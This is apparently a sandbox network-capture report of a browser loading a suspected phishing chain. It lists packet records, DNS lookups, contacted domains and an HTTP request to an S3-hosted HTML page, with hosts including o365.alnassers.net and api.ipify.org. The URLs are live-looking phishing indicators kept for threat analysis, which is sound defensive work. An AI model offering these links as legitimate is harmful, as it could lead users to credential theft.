                                                                                      Nov 15, 2024 18:09:13.339309931 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.339345932 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.339406013 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.361452103 CET62657443192.168.2.16172.67.74.152
                                                                                      Nov 15, 2024 18:09:13.361525059 CET44362657172.67.74.152192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.361629009 CET62657443192.168.2.16172.67.74.152
                                                                                      Nov 15, 2024 18:09:13.366722107 CET62657443192.168.2.16172.67.74.152
                                                                                      Nov 15, 2024 18:09:13.366738081 CET44362657172.67.74.152192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.457462072 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.457474947 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.457518101 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.457530022 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.457724094 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.457724094 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.457758904 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.457813025 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.576149940 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.576168060 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.576301098 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.576337099 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.576411009 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.696613073 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.696639061 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.696830034 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.696866035 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.696923018 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.813625097 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.813699007 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.813810110 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.813867092 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.813867092 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.813867092 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.813906908 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.813930988 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.813992023 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.814322948 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.814340115 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:14.041973114 CET44362657172.67.74.152192.168.2.16
                                                                                      Nov 15, 2024 18:09:14.042433977 CET62657443192.168.2.16172.67.74.152
                                                                                      Nov 15, 2024 18:09:14.042474031 CET44362657172.67.74.152192.168.2.16
                                                                                      Nov 15, 2024 18:09:14.043955088 CET44362657172.67.74.152192.168.2.16
                                                                                      Nov 15, 2024 18:09:14.044029951 CET62657443192.168.2.16172.67.74.152
                                                                                      Nov 15, 2024 18:09:14.044420004 CET62657443192.168.2.16172.67.74.152
                                                                                      Nov 15, 2024 18:09:14.044504881 CET44362657172.67.74.152192.168.2.16
                                                                                      Nov 15, 2024 18:09:14.044589043 CET62657443192.168.2.16172.67.74.152
                                                                                      Nov 15, 2024 18:09:14.044600010 CET44362657172.67.74.152192.168.2.16
                                                                                      Nov 15, 2024 18:09:14.094842911 CET62657443192.168.2.16172.67.74.152
                                                                                      Nov 15, 2024 18:09:14.244956970 CET44362657172.67.74.152192.168.2.16
                                                                                      Nov 15, 2024 18:09:14.245033979 CET44362657172.67.74.152192.168.2.16
                                                                                      Nov 15, 2024 18:09:14.245109081 CET62657443192.168.2.16172.67.74.152
                                                                                      Nov 15, 2024 18:09:14.246174097 CET62657443192.168.2.16172.67.74.152
                                                                                      Nov 15, 2024 18:09:14.246206999 CET44362657172.67.74.152192.168.2.16
                                                                                      Nov 15, 2024 18:09:23.873441935 CET62658443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:09:23.873553991 CET4436265852.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:09:23.873651028 CET62658443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:09:23.873989105 CET62658443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:09:23.874020100 CET4436265852.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:09:24.761670113 CET4436265852.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:09:24.761913061 CET62658443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:09:24.762924910 CET62658443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:09:24.762958050 CET4436265852.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:09:24.763176918 CET4436265852.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:09:24.764425993 CET62658443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:09:24.811327934 CET4436265852.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:09:25.060096025 CET4436265852.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:09:25.060123920 CET4436265852.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:09:25.060137987 CET4436265852.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:09:25.060235023 CET62658443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:09:25.060271025 CET4436265852.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:09:25.060338020 CET62658443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:09:25.177090883 CET4436265852.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:09:25.177156925 CET4436265852.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:09:25.177201986 CET62658443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:09:25.177220106 CET4436265852.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:09:25.177237988 CET4436265852.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:09:25.177262068 CET62658443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:09:25.177303076 CET62658443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:09:25.177359104 CET62658443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:09:25.177392960 CET4436265852.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:09:25.177417040 CET62658443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:09:25.177431107 CET4436265852.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:09:25.960911036 CET4969780192.168.2.162.16.164.67
                                                                                      Nov 15, 2024 18:09:25.961003065 CET4969980192.168.2.162.16.164.67
                                                                                      Nov 15, 2024 18:09:25.966342926 CET80496972.16.164.67192.168.2.16
                                                                                      Nov 15, 2024 18:09:25.966402054 CET4969780192.168.2.162.16.164.67
                                                                                      Nov 15, 2024 18:09:25.966756105 CET80496992.16.164.67192.168.2.16
                                                                                      Nov 15, 2024 18:09:25.966804981 CET4969980192.168.2.162.16.164.67
                                                                                      Nov 15, 2024 18:09:46.732357979 CET5377053192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:46.737257957 CET53537701.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:46.737363100 CET5377053192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:46.737426043 CET5377053192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:46.742340088 CET53537701.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:47.334310055 CET53537701.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:47.334929943 CET5377053192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:47.341366053 CET53537701.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:47.341484070 CET5377053192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:48.319489002 CET53772443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:09:48.319585085 CET44353772142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:09:48.319834948 CET53772443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:09:48.320149899 CET53772443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:09:48.320219040 CET44353772142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:09:49.161017895 CET44353772142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:09:49.161508083 CET53772443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:09:49.161575079 CET44353772142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:09:49.161901951 CET44353772142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:09:49.162309885 CET53772443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:09:49.162380934 CET44353772142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:09:49.210119009 CET53772443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:09:59.160828114 CET44353772142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:09:59.160909891 CET44353772142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:09:59.161094904 CET53772443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:09:59.672656059 CET53772443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:09:59.672693014 CET44353772142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:10:14.685040951 CET49698443192.168.2.1640.126.32.134
                                                                                      Nov 15, 2024 18:10:14.685189962 CET4970080192.168.2.16192.229.221.95
                                                                                      Nov 15, 2024 18:10:14.691298962 CET4434969840.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:10:14.691380978 CET49698443192.168.2.1640.126.32.134
                                                                                      Nov 15, 2024 18:10:14.691385984 CET8049700192.229.221.95192.168.2.16
                                                                                      Nov 15, 2024 18:10:14.691442966 CET4970080192.168.2.16192.229.221.95
                                                                                      Nov 15, 2024 18:10:17.543183088 CET49701443192.168.2.1640.126.32.134
                                                                                      Nov 15, 2024 18:10:17.549272060 CET4434970140.126.32.134192.168.2.16
                                                                                      Nov 15, 2024 18:10:17.549387932 CET49701443192.168.2.1640.126.32.134
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 15, 2024 18:08:43.472939014 CET6155553192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:43.473531008 CET5623253192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:43.480696917 CET53615551.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.481775045 CET53562321.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.501492023 CET53565911.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:43.539679050 CET53494601.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:45.007158041 CET53560011.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:46.715342999 CET5503653192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:46.715465069 CET6434353192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:46.733834982 CET53550361.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:46.738548040 CET53643431.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:48.252695084 CET4947753192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:48.253129005 CET5681453192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:48.259665012 CET53494771.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:48.259727955 CET53568141.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:48.996793985 CET5967253192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:48.997108936 CET4987353192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:49.004417896 CET53596721.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.004432917 CET53498731.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.843856096 CET53513551.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.944873095 CET5225153192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:50.944998026 CET5640553192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:50.952052116 CET53522511.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.952114105 CET53564051.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.952182055 CET5812653192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:50.952538967 CET5671253192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:50.959311008 CET53581261.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.959574938 CET53567121.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.035945892 CET5767253192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:05.036089897 CET6325253192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:05.043071985 CET53576721.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.043153048 CET53632521.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.181063890 CET5777453192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:06.181190968 CET6507353192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:06.185396910 CET5287053192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:06.185534000 CET5920453192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:06.188232899 CET53577741.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.188268900 CET53650731.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.226870060 CET53528701.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.239263058 CET53592041.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.840249062 CET5663553192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:10.842559099 CET5663453192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:10.876825094 CET53566341.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.885555029 CET53566351.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.910870075 CET6525253192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:10.911058903 CET5340053192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:10.918387890 CET53652521.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.918421030 CET53534001.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.315217018 CET5226653192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:12.315418959 CET5308153192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:12.322087049 CET53522661.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.323266029 CET53530811.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.331703901 CET5991053192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:12.331856966 CET6465953192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:12.340234041 CET53646591.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.340517044 CET53599101.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.351324081 CET5567553192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:13.353272915 CET5860253192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:09:13.358299971 CET53556751.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.360740900 CET53586021.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:43.401364088 CET53526611.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:09:44.535191059 CET138138192.168.2.16192.168.2.255
                                                                                      Nov 15, 2024 18:09:46.731379986 CET53593931.1.1.1192.168.2.16
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Nov 15, 2024 18:08:43.472939014 CET192.168.2.161.1.1.10x3a84Standard query (0)s3.eu-west-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:43.473531008 CET192.168.2.161.1.1.10xcfe5Standard query (0)s3.eu-west-1.amazonaws.com65IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:46.715342999 CET192.168.2.161.1.1.10xd5a2Standard query (0)gambol.smarthost.plA (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:46.715465069 CET192.168.2.161.1.1.10x4130Standard query (0)gambol.smarthost.pl65IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:48.252695084 CET192.168.2.161.1.1.10x441eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:48.253129005 CET192.168.2.161.1.1.10x2d47Standard query (0)www.google.com65IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:48.996793985 CET192.168.2.161.1.1.10x4900Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:48.997108936 CET192.168.2.161.1.1.10x3e42Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:50.944873095 CET192.168.2.161.1.1.10xfc74Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:50.944998026 CET192.168.2.161.1.1.10xecaStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:50.952182055 CET192.168.2.161.1.1.10x6c3dStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:50.952538967 CET192.168.2.161.1.1.10xec66Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:05.035945892 CET192.168.2.161.1.1.10x162eStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:05.036089897 CET192.168.2.161.1.1.10x6c0Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:06.181063890 CET192.168.2.161.1.1.10xab12Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:06.181190968 CET192.168.2.161.1.1.10xd9a6Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:06.185396910 CET192.168.2.161.1.1.10x5077Standard query (0)o365.alnassers.netA (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:06.185534000 CET192.168.2.161.1.1.10x9486Standard query (0)o365.alnassers.net65IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:10.840249062 CET192.168.2.161.1.1.10x6544Standard query (0)o365.alnassers.netA (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:10.842559099 CET192.168.2.161.1.1.10xa57eStandard query (0)o365.alnassers.net65IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:10.910870075 CET192.168.2.161.1.1.10x63a4Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:10.911058903 CET192.168.2.161.1.1.10x55e4Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:12.315217018 CET192.168.2.161.1.1.10x3de2Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:12.315418959 CET192.168.2.161.1.1.10x93acStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:12.331703901 CET192.168.2.161.1.1.10x9780Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:12.331856966 CET192.168.2.161.1.1.10xde82Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:13.351324081 CET192.168.2.161.1.1.10xe860Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:13.353272915 CET192.168.2.161.1.1.10xe973Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Nov 15, 2024 18:08:43.480696917 CET1.1.1.1192.168.2.160x3a84No error (0)s3.eu-west-1.amazonaws.com52.218.122.88A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:43.480696917 CET1.1.1.1192.168.2.160x3a84No error (0)s3.eu-west-1.amazonaws.com52.218.25.171A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:43.480696917 CET1.1.1.1192.168.2.160x3a84No error (0)s3.eu-west-1.amazonaws.com52.218.62.19A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:43.480696917 CET1.1.1.1192.168.2.160x3a84No error (0)s3.eu-west-1.amazonaws.com52.218.29.35A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:43.480696917 CET1.1.1.1192.168.2.160x3a84No error (0)s3.eu-west-1.amazonaws.com52.218.108.243A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:43.480696917 CET1.1.1.1192.168.2.160x3a84No error (0)s3.eu-west-1.amazonaws.com52.92.36.120A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:43.480696917 CET1.1.1.1192.168.2.160x3a84No error (0)s3.eu-west-1.amazonaws.com52.218.117.56A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:43.480696917 CET1.1.1.1192.168.2.160x3a84No error (0)s3.eu-west-1.amazonaws.com52.218.121.24A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:46.733834982 CET1.1.1.1192.168.2.160xd5a2No error (0)gambol.smarthost.pl91.211.222.250A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:48.259665012 CET1.1.1.1192.168.2.160x441eNo error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:48.259727955 CET1.1.1.1192.168.2.160x2d47No error (0)www.google.com65IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:49.004417896 CET1.1.1.1192.168.2.160x4900No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:49.004417896 CET1.1.1.1192.168.2.160x4900No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:49.004432917 CET1.1.1.1192.168.2.160x3e42No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:50.952052116 CET1.1.1.1192.168.2.160xfc74No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:50.952052116 CET1.1.1.1192.168.2.160xfc74No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:50.952114105 CET1.1.1.1192.168.2.160xecaNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:50.959311008 CET1.1.1.1192.168.2.160x6c3dNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:50.959311008 CET1.1.1.1192.168.2.160x6c3dNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:50.959574938 CET1.1.1.1192.168.2.160xec66No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                      Nov 15, 2024 18:08:54.508192062 CET1.1.1.1192.168.2.160x75d7No error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:05.043071985 CET1.1.1.1192.168.2.160x162eNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:05.043071985 CET1.1.1.1192.168.2.160x162eNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:05.043153048 CET1.1.1.1192.168.2.160x6c0No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:06.188232899 CET1.1.1.1192.168.2.160xab12No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:06.188232899 CET1.1.1.1192.168.2.160xab12No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:06.188268900 CET1.1.1.1192.168.2.160xd9a6No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:06.226870060 CET1.1.1.1192.168.2.160x5077No error (0)o365.alnassers.net147.79.74.176A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:10.885555029 CET1.1.1.1192.168.2.160x6544No error (0)o365.alnassers.net147.79.74.176A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:10.918387890 CET1.1.1.1192.168.2.160x63a4No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:10.918387890 CET1.1.1.1192.168.2.160x63a4No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:10.918387890 CET1.1.1.1192.168.2.160x63a4No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:10.918387890 CET1.1.1.1192.168.2.160x63a4No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:12.322087049 CET1.1.1.1192.168.2.160x3de2No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:12.322087049 CET1.1.1.1192.168.2.160x3de2No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:12.322087049 CET1.1.1.1192.168.2.160x3de2No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:12.322087049 CET1.1.1.1192.168.2.160x3de2No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:12.340234041 CET1.1.1.1192.168.2.160xde82No error (0)api.ipify.org65IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:12.340517044 CET1.1.1.1192.168.2.160x9780No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:12.340517044 CET1.1.1.1192.168.2.160x9780No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:12.340517044 CET1.1.1.1192.168.2.160x9780No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:13.358299971 CET1.1.1.1192.168.2.160xe860No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:13.358299971 CET1.1.1.1192.168.2.160xe860No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:13.358299971 CET1.1.1.1192.168.2.160xe860No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                      Nov 15, 2024 18:09:13.360740900 CET1.1.1.1192.168.2.160xe973No error (0)api.ipify.org65IN (0x0001)false
                                                                                      • s3.eu-west-1.amazonaws.com
                                                                                      • https:
                                                                                        • gambol.smarthost.pl
                                                                                        • challenges.cloudflare.com
                                                                                        • cdnjs.cloudflare.com
                                                                                        • o365.alnassers.net
                                                                                        • code.jquery.com
                                                                                        • api.ipify.org
                                                                                      • slscr.update.microsoft.com
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.164970752.218.122.884437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:44 UTC809OUTGET /patnla.chivivemie/mandlas%23%2377374%23etikos3438%2324737%23madbviewmine%23%26%23%26%23portca3737%237347739%23737373%2334773%2383838%23.html HTTP/1.1
                                                                                      Host: s3.eu-west-1.amazonaws.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Upgrade-Insecure-Requests: 1
